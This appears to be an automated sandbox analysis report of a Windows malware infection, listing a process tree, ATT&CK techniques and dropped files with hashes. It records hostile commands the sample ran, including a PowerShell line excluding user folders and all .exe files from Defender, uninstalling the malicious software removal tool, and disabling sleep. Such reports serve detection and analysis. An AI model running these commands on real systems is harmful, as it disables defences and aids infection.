C:\Users\Admin\AppData\Local\Temp\a\64.exe
"C:\Users\Admin\AppData\Local\Temp\a\64.exe"
2⤵
- Executes dropped EXE
PID:5504

C:\Windows\SYSTEM32\cmd.exe
cmd
3⤵
PID:2820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4436 -ip 4436
1⤵
PID:2780

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:756

C:\Windows\system32\SearchProtocolHost.exe
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
2⤵
- Modifies data under HKEY_USERS
PID:4544

C:\Windows\system32\SearchFilterHost.exe
"C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 784
2⤵
- Modifies data under HKEY_USERS
PID:3224

C:\Program Files\Windows Media Player\wmpnetwk.exe
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6412

C:\Program Files\Windows Media Player\wmixedwk.exe
"C:\Program Files\Windows Media Player\wmixedwk.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:5892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:6880

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in System32 directory
- Drops file in Program Files directory
PID:5488

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1196

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in System32 directory
- Drops file in Program Files directory
PID:7936

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:7616

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:7700

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:6908

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:3744

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:4580

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:7856

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:1680

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:5996

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:8136

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:7576

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in System32 directory
- Drops file in Program Files directory
PID:3736

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:6728

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:5828

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:3968

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:2736

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:3624

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:2148

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:1980

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:3920

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:1280

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in Program Files directory
PID:3652

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
3⤵
- Drops file in System32 directory
- Drops file in Program Files directory
PID:3380

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:7184

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:6428

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:4064

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:4044

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:7648

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:6068

C:\Windows\system32\conhost.exe
conhost.exe
2⤵
PID:5964

C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe
C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:5776

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:5732

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:1528

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:6436

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:7672

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:7980

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:7752

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:5704

C:\Windows\explorer.exe
explorer.exe
2⤵
PID:5756

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

File and Directory Permissions Modification

T1222

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows Media Player\background.jpg
Filesize
1.8MB

MD5
6a3652d0a357e1c4782f6a6a5d41e7df

SHA1
3be7727cc6b713476214b2e78d48b29877f7cec8

SHA256
b712fa70a550a8da9748eeccee3ec3a453d31cada713ed56fd263a158a583171

SHA512
0e11a64fb4d77d056c530871c09fb373dae9131b46ab7ce382ee7f80f49dd4d5a966798f4c4f37c26fa713b24da778035c8fdbadda907156a43dfba55c0e0f0f

Download Submit
C:\Program Files\Windows Media Player\mpsvc.dll
Filesize
126KB

MD5
6719de6f0c460bde4c3d56e01952e093

SHA1
6bc39ada34ab4021afc74120f385ab620e62be88

SHA256
1af4abae2b2760280dfa6ceb1dd1e3a2a03c986fb64ef32540811be5d5c90ad7

SHA512
12b2f5c172e471f9962641221d8120e0c553d0f591133d1971b8f2096095e8ecf65596c65264575f5dddb74828e5eb3fe32bd66fa6ca12472fbab1e01d8c4920

Download Submit
C:\Program Files\Windows Media Player\wmpnetwk.exe
Filesize
23KB

MD5
90b85ffbdeead1be861d59134ea985b0

SHA1
55e9859aa7dba87678e7c529b571fdf6b7181339

SHA256
ed0dc979eed9ab9933c49204d362de575c7112a792633fda75bb5d1dab50a5c2

SHA512
8a1c10bbfe5651ab25bf36f4e8f2f65424c8e1004696c8141498b99ea2fbd7b3e5fae4d2cfee6835f7ff46bd2333602f4d8ac4a0f5b8e9757adb176332a3afce

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
64KB

MD5
2cd00f4dd6659febe12deaf9e6bfbb3a

SHA1
7fd06de7ad63cc825484842a220e209a482b1b62

SHA256
d1201be2c4186813da629165f495d6faf8070587eb348b1bc7b1dc67f0e1bb87

SHA512
e094eaf171078e5a71c253c995ee74a894a4ef3a39b1f7bd75a6601802c84b3304359760e5d71f9dffe7dc6b98608cbee6a73dd424c61e7f69034f1c2aefbaea

Download Submit
C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe
Filesize
2.2MB

MD5
8358f1dd3fc6a236434e9eff45f1a2d8

SHA1
7a0007ca44015af841015f0775752fede3c167e1

SHA256
1f4436584109c2fd0240f92a4d978c6ec021268505515f1e4cf27938db53e849

SHA512
477325120bcdc745bab552eef142100d12d6c46679b979773e938d79c528cc4b2de6412ac621a2d8d0773d3d35663e1e0950deb9b4183fcf783fc6273918f7e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\144aedb5
Filesize
1.7MB

MD5
3db39aa30df77ddcb2e5b50998a869f4

SHA1
fcfaa9cadaf8332aa6eb4c438036ff17a2899cc9

SHA256
57387226ddda11faf8909e4edd47ae3d4edac978c035308ba63a5686e580e52a

SHA512
596e9833febcdb4c1e84d79258cb305618a252f35d4760be7be695c7abe4ee014b085a7afc33fc6252f0c93affcc8ca405915b8942bd41e736c3a3cf3ab48ea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\151665603.exe
Filesize
10KB

MD5
47340d40e7f73e62cf09ac60fd16ad68

SHA1
effd38f6561155802d3e5090f5714589eae5ce6e

SHA256
e8a0c46342abd882318dbfdb17b7d3cb93d7138564878a15c5b91229ed81689c

SHA512
2d5fbacad67eba3c42c2be95c3bf64d787d15cf96d5afe827d6f9bdb175295859e684202ff5afc773202f4b9d0b3135e913c997bbe72026cd7a7ca96ecf5aa08

Download Submit
C:\Users\Admin\AppData\Local\Temp\195d9bec
Filesize
1.7MB

MD5
991b91826af732b41565b2b5083d009c

SHA1
d718090336174007e221be35178efbf0a1b58e1e

SHA256
dc88b67213fbbda17bfa9725bc84fba1f454a9ab74d92d44e3339cb22dcfdb0b

SHA512
3b5864f54f856c03f65322dcdfc494d8121b92a4de88953e1449795625645b215897f0cd050dc3560c4d13f5f1c09ad5772e5ab5af507afcb5c74761419a5328

Download Submit
C:\Users\Admin\AppData\Local\Temp\DOCUMENT (3).PDF
Filesize
14KB

MD5
a407c54a89a1dc65074b2f09b8664f34

SHA1
b7d984e56575de4fe305e3b2b386f20810e69953

SHA256
938d9f85529b66633c6174ebc191774836d5627ca00522934ce67d893f2078f0

SHA512
7cad8abee45167e807c2ee399e8ea0287be5686853a20ea929b4ae9a2229bc11623ef3087c58355d124dd2841a5e7afd852fc746041bd5e3b5fe787326509da6

Download Submit
C:\Users\Admin\AppData\Local\Temp\FUT.au3
Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll
Filesize
742KB

MD5
544cd51a596619b78e9b54b70088307d

SHA1
4769ddd2dbc1dc44b758964ed0bd231b85880b65

SHA256
dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd

SHA512
f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\SysWOW64T\slwga.dll
Filesize
14KB

MD5
788a402d0fcc43662ba8b73c85c63c7f

SHA1
d5cec0d57a7516db6cdecbdc3d335db24444037b

SHA256
79950cff432a65ddf605b7194ded9529849108f6f3e0f6a44541d0f1f90e0f60

SHA512
8c52d8cf92429314942cd198e8aeec0b9d8f5b93e6545993eb69f6c00e59dbff29e83c6a65ef31e7faa5ef60965d7bf075846d4b6b88880b4afe14957620213e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\SysWOW64T\sppwmi.dll
Filesize
116KB

MD5
bad4c7c3c11d8bd6b7f81887cb3cac5f

SHA1
80e23c13e67e6af29a2deb31a643148e69887c53

SHA256
a409caf11abd17ca932c2e6269e0f024cc781aa6ae9d56ba94a367b6239422b4

SHA512
27864f4f206661e427d371df93a15d7e818ff45fc3a7c10005f7e260b7106dc77a8437411f2c2d2d935b481771975ad354d051b3c1ae2ab5b010ea3d8b89a8b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\SysWOW64T\winver.dll
Filesize
12KB

MD5
161a5f076af5f6268665ebbcf53a4937

SHA1
1cab495c456d4d7dfc936a13b800884af8554704

SHA256
62977bb66738ef09910c2e30c5e09cf462a82144b4ad91f0ad42a83b2f994f55

SHA512
ed96a0b384bb97e33159bc7f0c51146a338645fd678c6d399620d665b26e17413f1290a9d2698b38c6d10e66d39958c31e5deb5fb4a471ab4f7eff4df5111b35

Download Submit
C:\Users\Admin\AppData\Local\Temp\SIG.EXE
Filesize
3.4MB

MD5
64fb7bebeb2e58cdeef83cc42f624f1b

SHA1
242307f03a7d9dc7c76737246d710bf10efe998f

SHA256
0965f85212e3c5fc2cd3e14499fd65b90c5aac7029a3d0afd61525284c5dc88f

SHA512
ec21a3064b68dd87a13e5128cc279ed3ea92c3aa26b245aaf7211ba3cf5bf32c71476b679d0c7a9b94035e18bdb9dea1fe8eb053f7c30d791a026ba4e5398cec

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_to2uzuvg.bgi.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\222.exe
Filesize
6.5MB

MD5
0603ce41d19c5ed6f06d28d7c1a0d8fe

SHA1
f6851bbba9127c624fb8e9993f747275bfd5e2eb

SHA256
63ce5a5c895df81cf05bd0d93f568f5d0f0008bb02c47fa0ce19af76c724cc1d

SHA512
2c483c352d4e9eca8f8db546e2a7014477709c320f779b24ae928bc78889ef16c784f96a9686d2d33a393dfb967aceb757dc3b2e39c708357233112d6ce02119

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\64.exe
Filesize
7KB

MD5
e1517885f6c71f7b3dafa6d4610c4762

SHA1
01edbfd0a59d9addad0f30c5777351c484c1fcd1

SHA256
4456f9a5d25296d8e6e184d50ec5355f01848263ce32e8379120a1077194a5ba

SHA512
4c947836d668dac764f0945c3438a0e1aae6c647560907a96096a6af9795a4b753f1c138e526d06029d364a28e900cbca07566c56df14764d232e3bacbca6c93

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe
Filesize
436KB

MD5
46fc9e5e1fbeed55281cd5f25310f8d3

SHA1
be6bb9f76a2545781a628690602eab704ce1e64b

SHA256
0494a21fd6ec0405206dbe6c82525b895f09ff4c240a301e1baae682c5ad80a2

SHA512
c7b3a65f50a6e0bffea72a215fa717378c93d767d287c711912dda55dff6294bd2266a502cfe80aea4c6bdaae03170bd5b50bdcc175bcd146c6a79ed7bee0b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe
Filesize
2.1MB

MD5
b6cc199e11c8173382c129c7580d1160

SHA1
218a3fe633e91585891f5533e980345b0b36edf1

SHA256
8a2d24173df00f8af5787df985d10c4b678c800eebb40eb0be876e2ace647b10

SHA512
116862fb184e8229e8ac6310e24809e900ed0273c56dec36fa0c77ec660631ce4e9616b650dfce655b9dc375e6ff7644abeebaa2c65a8fb1f4297e77135834dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe
Filesize
5.0MB

MD5
a4e84bdb6fba7b3c5689b0f2bc5ec858

SHA1
6ef4aaf5a594b23cb64e168824b1fc2376cf6c5e

SHA256
48605846c229a73a9695d0a6567982bb558e5108b2251b74ad2cdba66e332632

SHA512
c2241abab28b6d31f33fb17b89983fbfdfe03d55ca1078e8de29e4b56328ed5933c577c0e0865d8edcf897b9d752e8a011a22297f9d87cb683ce9f0522f763ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\alabi.exe
Filesize
435KB

MD5
794a7bc49c07d085d9e3cd15515f961d

SHA1
ba3c257dc49a4fef8f59465b179b505db096fe33

SHA256
3ba0f4f8645247e4f440e38ca2b0f91bed5d239452e97054e75e25d371ec4d98

SHA512
6d56bbe23e395fa4839bc96e4632e6e98b2834b0a11fb34322c96f50a2b734f7a0d00f2c5b458766e389c739c3d5d03fec661038737ff6c340e3a7754a6b2f97

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\client.exe
Filesize
3.1MB

MD5
4a603ec4e3c5a21400eaabac7c6401c6

SHA1
23b446721eacd0b6796407ca20bd1e01355ab41f

SHA256
566ba756b7fc2174fc195c05d9e0a36aa706e4ce397f890488227b7d0ad4ad7c

SHA512
070a5dd14bce16ba58eb65f3b3143fc7890f0e34f2ed7f3a1930e3fa8454ebcf615b43c819f16f4fc494676443bd409a3a57e8fe6e8f39ab02df5ace497eaea0

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\conhost.exe
Filesize
2.5MB

MD5
be320b59ef29060678bcb78d6c8fa059

SHA1
eb76091dc908c5bcf1ddd24900f53b6d9119bf53

SHA256
9fdadcad0d51590fd9b604d464cdac18c9b34d43b4194c7d54110b299a841145

SHA512
8015324abb929d2ff22c1ba96bf79fe2393a16ad9daa93caef756ab41122b9e582fca68aaf8b625934aad3140223db6928a105633bb5ca209a2a3980383383fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\crt.exe
Filesize
5.2MB

MD5
1e9371c7eb8b2ad613afd09eab341887

SHA1
845e0f5c40104d431b8f690754671bd7c3531fc8

SHA256
88198ae8178cf02f541c8bd9211d73697ca68a643f1622b858063e3639e0aa27

SHA512
868574b6a840a05790b795669a02f12b73be1524c216222f79c4d1f61eed4292eecd4436aca697938e6675ebb765f5e5ca02fb6736824080dff18b112e649026

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe
Filesize
7.8MB

MD5
636ea646281c99d3d05cdefdca29cf5e

SHA1
77b6e50b8866f7b41d678995b8d448237edcddef

SHA256
01dde6eab064a347e1b0b8dc3074e7ac96203e1bbd1bec7cddf4b6fdfadee61c

SHA512
f63f21d87a7204967b6de980f3385cfc48c6a956d6d071005e593b40886d5292b8ec62c604c76200f93136db81f5ee3626f1663b7ee7afc1a8f0fa3e37c64350

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\inte.exe
Filesize
176KB

MD5
c4b190a1a8f5d8f4353cbd49da567e35

SHA1
fa51479767318ec1ed868ad80625748d416b3120

SHA256
7e954cf97b3d43923146e1118723eb095e07b81ef6acd6539a601c04a7b21ff5

SHA512
e92d7c7267099b6103d8f9cc3f94daa4c662c5b13446fcc7a85bbe6f0d45beb8e0fe04539147f3d0aa4c3c5592ef1b0d72ef56620d7ee6733e50f5b2802ca1fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\oiii.exe
Filesize
291KB

MD5
7562a8f108271b96994b95ea35494f7f

SHA1
42bf054fd00311f2a47f89c0c1d5674ff485ac71

SHA256
0eda07e22619ffa11c789a1ebf945d8f8510a210dc7b1c898a9a09e706ad4b4c

SHA512
e43076d160b33bd26845f7144e848b729d5fd329045835ced8d715dbcaff3fc0ca3bfad3f736a467c2835517fd548eee4aca8ec30a8655ec79777d5628e54259

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\output.exe
Filesize
5.5MB

MD5
461e951ba79964b681e9a8bc9d61a92c

SHA1
c860285cc237d35022fea21eba03c82e86ea3d1e

SHA256
de36e0af9cd7e32d781be2ab937a7dca33a9f93dcbecd06ff944641e5196c51f

SHA512
b85af74593267854a24d9a03a046c3d00cfd25401a9b304061f508d46c559e4773801dda28c0a54c15b2c9334fbfa2f391be9194828334cbe4be50811ed0c19f

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\print.exe
Filesize
2.7MB

MD5
6ea7a8430947755910dd530609ccd33c

SHA1
7afcd8da78c756f05dc245028e878bd9396722c6

SHA256
2ac2391710994cf90972b425abf650ec47326ec9a51063e94fc1bfa27d9b1f7c

SHA512
38a5aae0d369b744d6b28a56cff7c2a7c0fc94916cee6f6bb578e482682a3587757eceb3a9cd52731a7cfa26d49b3bd43fdbd73883511678c9659a5d6405946b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\reverse.exe
Filesize
72KB

MD5
94604756b7991e2361c98c1ffd1a50ff

SHA1
b72f2589a2ad566cf45b58965721abf2ddd5c7f7

SHA256
7c2465e391b9f2bd8b257e5c8eef9ea09201c08c44f7b76d01467dcf1db52556

SHA512
68d959e6be422cf7ec23a439f30235b8f48f4e7dfffaf3293382100442f1f913d65b9f33f14fb98a54d7e657e294b645356150430730f5faf14ed95ef40b8a81

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe
Filesize
2.1MB

MD5
8da5f3d5477e870f00e2d5af6e50a0a2

SHA1
c596b93af682d40f87f14f29b815639b0ce0ebde

SHA256
17d9a25d421e02c4ddf2ce3da57224c02e5f8bb923b6a5eab3b65b7c4733318e

SHA512
2e97f5618c5f194331290412d9a7157b6c5ec932d699b6c70073d0c6c82a626a7cd3b1c00d4f135070fbbea25660870ef0f115517209dd49838674331470aeb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
Filesize
36KB

MD5
f55d89f82515bde23bb272f930cb9492

SHA1
666d0f5a98f03292abf16cd2de599997c836926a

SHA256
4d9fb14e15d1613a7a5d70efbacb0f153729f02216116c3f7f117b033bd7655c

SHA512
a7a62daf90aae27207b77034e8a76d5b3f8aa05430bd8768d46be7f3843962ddc1ef154691dc0f26051605fbb36269e59f18c3c75fdf72222346188e7a6cf03b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe
Filesize
104KB

MD5
9a24a00438a4d06d64fe4820061a1b45

SHA1
6e59989652dff276a6dfa0f287b6c468a2f04842

SHA256
66944b456b33438cbf93d112d973112903f57dc16bf4c069e968562fa8f01b54

SHA512
80e97c8c389554ba0512b7f496dd03e82f2a627568eca631a6393033d540a70779fc7eae2485d1b9ca3657beb8ae9a86fd08ecd5dba678407bf8e63bef9a4629

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe
Filesize
49KB

MD5
ccb630a81a660920182d1c74b8db7519

SHA1
7bd1f7855722a82621b30dd96a651f22f7b0bf8a

SHA256
a73dc535324b73ab10c09ed2b965fc1b504a828f6059ddf99e26b9c03642a346

SHA512
8fd536da55b8e2a514bcea9cbe62492af1168b7713ea5955f3af8fcfa8060eac4ee079022380ab5ba5f9f7610a595981ed2f472fb14d569ac82057c50a785811

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\win1.exe
Filesize
73KB

MD5
26125c571d6225959832f37f9ac4629a

SHA1
ed7af3c41eaab7b10a2639f06212bd6ee0db6899

SHA256
94fada921a79c422e6dbf75eeca7429690d75901b5ef982a44874971b38708a0

SHA512
172b72f2a92c5ea119ee9369c91f6fb4431efc95fd7c1dad65c1d45886ae17025e55d7a2bf9bfbae6f163928799f0b79dc874ed19383aff281f5466a81b590d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\xin.exe
Filesize
4.3MB

MD5
11863412761ab6f0dadd70d838ac3989

SHA1
5724e78c916f83766cfc219c42beb4948ff3315d

SHA256
d12d4da3bab8a93ef31a5b25384c5e700299bada572d822f561e35138d15ae91

SHA512
1603837c5eea79c4785d1580fa29aaf06ae8ae05377e2ad271ad457675d40315350ee245e9039a241d9def0c068c48159a76fc7fdf7bd154165881ddd900c6e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8AK3P.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8AK3P.tmp\_isetup\_isdecmp.dll
Filesize
13KB

MD5
a813d18268affd4763dde940246dc7e5

SHA1
c7366e1fd925c17cc6068001bd38eaef5b42852f

SHA256
e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64

SHA512
b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-FUVD6.tmp\crt.tmp
Filesize
680KB

MD5
2b1448b48874851ff092b32dae44cfea

SHA1
a156c72c6f87817a3c88a0232bbafa39aa36301b

SHA256
08d83cc7c62e673495c8e18b6ff1e7600397c7ff9c3bd3b580678d50fcf3e950

SHA512
923195ffefc70808c1f63688e40500021b4a75e660c00dd110e08a6910f8ac85aef0736116f76096fffb34966aafff1bb3c5c2d6ff809951a94b47e2625bb3a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\katD433.tmp
Filesize
861KB

MD5
66064dbdb70a5eb15ebf3bf65aba254b

SHA1
0284fd320f99f62aca800fb1251eff4c31ec4ed7

SHA256
6a94dbda2dd1edcff2331061d65e1baf09d4861cc7ba590c5ec754f3ac96a795

SHA512
b05c6c09ae7372c381fba591c3cb13a69a2451b9d38da1a95aac89413d7438083475d06796acb5440cd6ec65b030c9fa6cbdaa0d2fe91a926bae6499c360f17f

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

